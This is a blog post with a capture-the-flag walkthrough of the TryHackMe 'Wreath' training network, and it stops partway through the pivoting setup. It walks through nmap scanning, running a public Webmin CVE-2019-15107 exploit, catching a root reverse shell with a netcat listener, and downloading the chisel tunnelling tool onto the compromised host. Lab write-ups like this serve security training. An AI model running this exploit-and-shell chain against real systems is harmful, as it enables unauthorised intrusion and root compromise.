<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="THM Wreath" />
<meta property="og:locale" content="en" />
<meta name="description" content="Wreath is a vulnerable network created by MuirlandOracle to serve as a learning resource. You can find it at this link. The focus of this network is on the following aspects:" />
<meta property="og:description" content="Wreath is a vulnerable network created by MuirlandOracle to serve as a learning resource. You can find it at this link. The focus of this network is on the following aspects:" />
<link rel="canonical" href="http://localhost:4000/posts/Wreath/" />
<meta property="og:url" content="http://localhost:4000/posts/Wreath/" />
<meta property="og:site_name" content="Alienfader" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-18T12:17:00-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="THM Wreath" />
<meta name="twitter:site" content="@Alienfader" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2023-08-18T12:17:00-04:00","datePublished":"2023-08-18T12:17:00-04:00","description":"Wreath is a vulnerable network created by MuirlandOracle to serve as a learning resource. You can find it at this link. The focus of this network is on the following aspects:","headline":"THM Wreath","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/Wreath/"},"url":"http://localhost:4000/posts/Wreath/"}</script>
<!-- End Jekyll SEO tag -->


  <title>THM Wreath | Alienfader
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Alienfader">
<meta name="application-name" content="Alienfader">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    
      <link rel="preconnect" href="https://cdnjs.cloudflare.com" >
      <link rel="dns-prefetch" href="https://cdnjs.cloudflare.com" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">
  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.25.0/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  
    <!-- Switch the mode between dark and light. -->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() {
      return 'mode';
    }
    static get MODE_ATTR() {
      return 'data-mode';
    }
    static get DARK_MODE() {
      return 'dark';
    }
    static get LIGHT_MODE() {
      return 'light';
    }
    static get ID() {
      return 'mode-toggle';
    }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener('change', () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }
          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();
      });
    } /* constructor() */

    get sysDarkPrefers() {
      return window.matchMedia('(prefers-color-scheme: dark)');
    }

    get isSysDarkPrefer() {
      return this.sysDarkPrefers.matches;
    }

    get isDarkMode() {
      return this.mode === ModeToggle.DARK_MODE;
    }

    get isLightMode() {
      return this.mode === ModeToggle.LIGHT_MODE;
    }

    get hasMode() {
      return this.mode != null;
    }

    get mode() {
      return sessionStorage.getItem(ModeToggle.MODE_KEY);
    }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      document.documentElement.setAttribute(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      document.documentElement.removeAttribute(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage(
        {
          direction: ModeToggle.ID,
          message: this.modeStatus
        },
        '*'
      );
    }

    flipMode() {
      if (this.hasMode) {
        if (this.isSysDarkPrefer) {
          if (this.isLightMode) {
            this.clearMode();
          } else {
            this.setLight();
          }
        } else {
          if (this.isDarkMode) {
            this.clearMode();
          } else {
            this.setDark();
          }
        }
      } else {
        if (this.isSysDarkPrefer) {
          this.setLight();
        } else {
          this.setDark();
        }
      }

      this.notify();
    } /* flipMode() */
  } /* ModeToggle */

  const modeToggle = new ModeToggle();
</script>

  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/commons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <h1 class="site-title">
      <a href="/">Alienfader</a>
    </h1>
    <p class="site-subtitle fst-italic mb-0">Hack. Sleep. Repeat.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/Alienfader"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Alienfader"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['Alienfaderr','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>THM Wreath</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->




<article class="px-1">
  <header>
    <h1 data-toc-skip>THM Wreath</h1>

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1692375420"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Aug 18, 2023
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://twitter.com/Alienfader">Alienfader</a>
            
          </em>
        </span>

        <!-- read time -->
        <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2196 words"
>
  <em>12 min</em> read</span>

      </div>
      <!-- .d-flex -->
    </div>
    <!-- .post-meta -->
  </header>

  <div class="content">
    <p>Wreath is a vulnerable network created by <a href="https://tryhackme.com/p/MuirlandOracle">MuirlandOracle</a> to serve as a learning resource. You can find it at <a href="https://tryhackme.com/p/MuirlandOracle">this link</a>. The focus of this network is on the following aspects:</p>

<ul>
  <li>Pivoting</li>
  <li>Working with <a href="Professional/Cyber Security/Tools/Empire C2">Empire C2</a></li>
  <li>Techniques for Simple Antivirus Evasion</li>
</ul>

<p><a href="/assets/wreath/vpn_wreath.png" class="popup img-link  shimmer"><img src="/assets/wreath/vpn_wreath.png" alt="img-description" loading="lazy"></a></p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>10.50.106.19
</pre></td></tr></tbody></table></code></div></div>
<h2 id="so-lets-start"><span class="me-2">So Let’s start!</span><a href="#so-lets-start" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>A web server is exposed to the public.</li>
  <li>The network hosts three devices.</li>
  <li>An internal git server exists somewhere in the network.</li>
  <li>Given its internal nature, Thomas might have stored sensitive data on the git server.</li>
  <li>A computer on the network has antivirus, suggesting a possible Windows OS.</li>
  <li>Indications hint at this being a server edition of Windows, potentially to our advantage.</li>
  <li>The presumed Windows machine isn’t directly accessible from the web server.</li>
</ul>

<p>Presuming that you were already connected to the network, let’s begin
First scan the ports on the target with <a href="obsidian://open?vault=sync%20test%20laptop&amp;file=Professional%2FCyber%20Security%2FPractical%20Hacking%2FHackthebox%2FAcademy%2FNmap%20Enumeration">nmap</a></p>

<h3 id="task-5-webserverenumeration"><span class="me-2">Task 5 Webserver Enumeration</span><a href="#task-5-webserverenumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<blockquote>
  <p>How many of the first 15000 ports are open on the target?</p>

</blockquote>

<blockquote>
  <p>What OS does Nmap think is running?</p>

</blockquote>

<blockquote>
  <p>Open the IP in your browser – what site does the server try to redirect you to?</p>

</blockquote>

<blockquote>
  <p>Read through the text on the page. What is Thomas’ mobile phone number?
<em>+447821548812</em></p>
</blockquote>

<blockquote>
  <p><em>Look back at your service scan results: what server version does Nmap detect as running here?</em>
MiniServ 1.890 (Webmin httpd)</p>
</blockquote>

<blockquote>
  <p>*What is the CVE number for this exploit?
CVE-2019-15107</p>
</blockquote>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> &lt;IP_Victim&gt;
</pre></td></tr></tbody></table></code></div></div>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>PORT      STATE    SERVICE          VERSION
22/tcp    filtered ssh
80/tcp    filtered http
443/tcp   filtered https
10000/tcp filtered snet-sensor-mgmt
</pre></td></tr></tbody></table></code></div></div>
<p>Next Add the URL to the DNS list</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">sudo </span>nano /etc/hosts
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>
127.0.0.1       localhost

127.0.1.1       XXX

10.200.105.200  thomaswreath.thm


::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters



</pre></td></tr></tbody></table></code></div></div>
<p>use [[CVE]] -2019-15107 to stablish <a href="obsidian://open?vault=sync%20test%20laptop&amp;file=Professional%2FCyber%20Security%2FTechnics%2FReverse%20shells">shell</a></p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>└─<span class="nv">$ </span>git clone https://github.com/MuirlandOracle/CVE-2019-15107
└─<span class="nv">$ </span><span class="nb">chmod </span>python file
└─<span class="nv">$ </span>./CVE-2019-15107.py  &lt;IP_Victim&gt;

</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>./CVE-2019-15107.py  10.200.105.200

        __        __   _               _         ____   ____ _____           
        <span class="se">\ \ </span>     / /__| |__  _ __ ___ <span class="o">(</span>_<span class="o">)</span>_ __   |  _ <span class="se">\ </span>/ ___| ____|          
         <span class="se">\ \ </span>/<span class="se">\ </span>/ / _ <span class="se">\ </span><span class="s1">'_ \| '</span>_ <span class="sb">`</span> _ <span class="se">\|</span> | <span class="s1">'_ \  | |_) | |   |  _|            
          \ V  V /  __/ |_) | | | | | | | | | | |  _ &lt;| |___| |___           
           \_/\_/ \___|_.__/|_| |_| |_|_|_| |_| |_| \_\____|_____|           
                                                                             
                                                @MuirlandOracle              
                                                                             
                                                                             
[*] Server is running in SSL mode. Switching to HTTPS
[+] Connected to https://10.200.105.200:10000/ successfully.
[+] Server version (1.890) should be vulnerable!
[+] Benign Payload executed!

[+] The target is vulnerable and a pseudoshell has been obtained.
Type commands to have them executed on the target.                           
[*] Type '</span><span class="nb">exit</span><span class="s1">' to exit.
[*] Type '</span>shell<span class="s1">' to obtain a full reverse shell (UNIX only).    

# shell
</span></pre></td></tr></tbody></table></code></div></div>
<p>Now opening a new terminal, we will run a listener in this case, [[ncat|netcat]]</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 4444                           
listening on <span class="o">[</span>any] 4444 ...
</pre></td></tr></tbody></table></code></div></div>
<p>Go back to the attacking terminal and follow the step by step giving by the program.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="o">[</span><span class="k">*</span><span class="o">]</span> Starting the reverse shell process
<span class="o">[</span><span class="k">*</span><span class="o">]</span> For UNIX targets only!
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Use <span class="s1">'exit'</span> to <span class="k">return </span>to the pseudoshell at any <span class="nb">time
</span>Please enter the IP address <span class="k">for </span>the shell: &lt;IP&gt;
Please enter the port number <span class="k">for </span>the shell: &lt;PORT&gt;
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Start a netcat listener <span class="k">in </span>a new window <span class="o">(</span>nc <span class="nt">-lvnp</span> 4444<span class="o">)</span> <span class="k">then </span>press enter.
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 4444                           
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>10.50.106.19] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.200.105.200] 56510
sh: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1823<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
sh: no job control <span class="k">in </span>this shell
sh-4.4# 
</pre></td></tr></tbody></table></code></div></div>

<p>Next, stabilize the shell</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>ctrl + z
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
</pre></td></tr></tbody></table></code></div></div>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>nc <span class="nt">-lvnp</span> 4444     
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>10.50.106.19] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.200.105.200] 56522
sh: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1823<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
sh: no job control <span class="k">in </span>this shell
sh-4.4# python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
<span class="o">[</span>root@prod-serv <span class="o">]</span><span class="c"># ^Z</span>
zsh: suspended  nc <span class="nt">-lvnp</span> 4444
                                                                                         
┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg</span>
<span class="o">[</span>1]  + continued  nc <span class="nt">-lvnp</span> 4444
                               <span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm
<span class="o">[</span>root@prod-serv <span class="o">]</span><span class="c"># whoami</span>
root
<span class="o">[</span>root@prod-serv <span class="o">]</span><span class="c"># </span>


</pre></td></tr></tbody></table></code></div></div>

<p>Next, lets download the  app here <a href="https://github.com/jpillora/chisel/releases/tag/v1.7.3">Here</a></p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wget https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_linux_amd64.gz
┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>wget https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_windows_amd64.gz
</pre></td></tr></tbody></table></code></div></div>

<p><a href="obsidian://open?vault=sync%20test%20laptop&amp;file=Compression">Compress</a> the folder with the files</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">tar</span> <span class="nt">-czvf</span> chisel.tar.gz chisel 
</pre></td></tr></tbody></table></code></div></div>
<p>Let’s initiate a server on our attacking machine, allowing us to securely download the compressed file to the target computer through the previously secured shell connection.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">sudo </span>python3 <span class="nt">-m</span> http.server 8080    
</pre></td></tr></tbody></table></code></div></div>
<p>Download using the following command</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="o">[</span>root@prod-serv twreath]# curl <span class="nt">-O</span> http://IP:8080/chisel.tar.gz

</pre></td></tr></tbody></table></code></div></div>
<p>Now lets <a href="obsidian://open?vault=sync%20test%20laptop&amp;file=Compression">decompress</a> the files</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="o">[</span>root@prod-serv twreath]# <span class="nb">tar</span> <span class="nt">-xzvf</span> chisel.tar.gz 
</pre></td></tr></tbody></table></code></div></div>
<p>Time to setup the [[Chisel]]
